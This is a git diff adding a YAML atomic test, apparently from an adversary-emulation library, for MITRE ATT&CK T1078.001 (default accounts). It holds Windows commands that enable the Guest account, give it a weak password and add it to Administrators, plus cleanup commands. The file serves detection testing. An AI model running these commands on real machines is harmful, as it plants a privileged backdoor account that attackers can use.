diff --git a/atomics/T1078.001/T1078.001.yaml b/atomics/T1078.001/T1078.001.yaml
new file mode 100644
index 00000000..c8813e44
--- /dev/null
+++ b/atomics/T1078.001/T1078.001.yaml
@@ -0,0 +1,17 @@
+attack_technique: T1078.001
+display_name: 'Valid Accounts: Default Accounts'
+atomic_tests:
+- name: Enable Guest account
+  description: After execution the Default Guest account will be enabled (Active) and added to Administrators Group
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      net user guest /active:yes
+      net user guest Paswword123!
+      net localgroup administrators guest /add
+    cleanup_command: |-
+      net user guest /active:no
+      net localgroup administrators guest /delete
+    name: command_prompt
+    elevation_required: true